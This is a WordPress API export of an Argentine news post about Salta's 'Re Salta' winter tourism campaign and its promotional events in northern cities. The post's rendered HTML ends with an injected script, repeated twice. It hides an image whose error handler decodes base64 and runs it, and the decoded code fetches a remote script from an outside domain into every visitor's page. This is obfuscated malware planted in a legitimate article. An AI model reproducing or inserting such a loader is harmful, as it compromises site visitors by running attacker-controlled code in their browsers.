{"id":5326,"date":"2025-07-14T11:07:57","date_gmt":"2025-07-14T14:07:57","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5326"},"modified":"2025-08-13T23:26:58","modified_gmt":"2025-08-14T02:26:58","slug":"salta-se-promociona-en-el-norte-argentino-con-la-campana-re-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5326","title":{"rendered":"Salta se promociona en el norte argentino con la campa\u00f1a Re Salta"},"content":{"rendered":"\n<p><strong><em>El Ministerio de Turismo y Deportes realizar\u00e1 durante las vacaciones de invierno una serie de acciones promocionales en Tucum\u00e1n, Santiago del Estero, Jujuy y ciudad de Salta para invitar a salte\u00f1os y turistas a disfrutar de la provincia durante la temporada invernal.<\/em><\/strong><\/p>\n\n\n\n<p>En el marco de las vacaciones de invierno y&nbsp;con&nbsp;la campa\u00f1a Re Salta, el Ministerio de Turismo y Deportes llevar\u00e1 adelante una agenda de acciones promocionales en plazas, parques y espacios p\u00fablicos de diferentes ciudades del norte argentino.<\/p>\n\n\n\n<p>Se realizar\u00e1n activaciones dirigidas al consumidor final para dar a conocer la campa\u00f1a tur\u00edstica Re Salta, con propuestas de interacci\u00f3n a trav\u00e9s de trivias con premios, entrega de merchandising y distribuci\u00f3n de folleter\u00eda con c\u00f3digos QR que permitir\u00e1n acceder al calendario con m\u00e1s de 900 actividades previstas en la provincia para que salte\u00f1os y turistas disfruten en las siete regiones tur\u00edsticas.<\/p>\n\n\n\n<p>El cronograma contempla acciones en San Miguel de Tucum\u00e1n el martes 15 de julio en Plaza Independencia; en Santiago del Estero, el mi\u00e9rcoles 16 de julio en Plaza Libertad; y en San Salvador de Jujuy, el jueves 17 de julio en&nbsp;plaza Belgrano.<\/p>\n\n\n\n<p>Estas actividades se complementar\u00e1n con acciones en la ciudad de Salta en puntos tur\u00edsticos clave como la Plazoleta IV Siglos, el Monumento a G\u00fcemes, Parque Sur, Shopping Alto Noa, Parque del Bicentenario, Aeropuerto Mart\u00edn Miguel de G\u00fcemes, la cima del Cerro San Bernardo y la Usina Cultural, en fechas que acompa\u00f1an el receso invernal, acercando la propuesta a salte\u00f1os y turistas que visiten la ciudad.<\/p>\n\n\n\n<p>Con estas acciones, Salta busca continuar consolidando su liderazgo como destino tur\u00edstico en el norte argentino, fortaleciendo su presencia en mercados regionales y promoviendo las experiencias culturales, naturales y gastron\u00f3micas que la provincia ofrece durante la temporada invernal.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Ministerio de Turismo y Deportes realizar\u00e1 durante las vacaciones de invierno una serie de acciones promocionales en Tucum\u00e1n, Santiago del Estero, Jujuy y ciudad de Salta para invitar a salte\u00f1os y turistas a disfrutar de la provincia durante la temporada invernal. En el marco de las vacaciones de invierno y&nbsp;con&nbsp;la campa\u00f1a Re Salta, el [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5327,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,18],"tags":[],"class_list":{"0":"post-5326","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5326"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5326"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5326\/revisions"}],"predecessor-version":[{"id":6442,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5326\/revisions\/6442"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5327"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5326"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5326"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5326"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}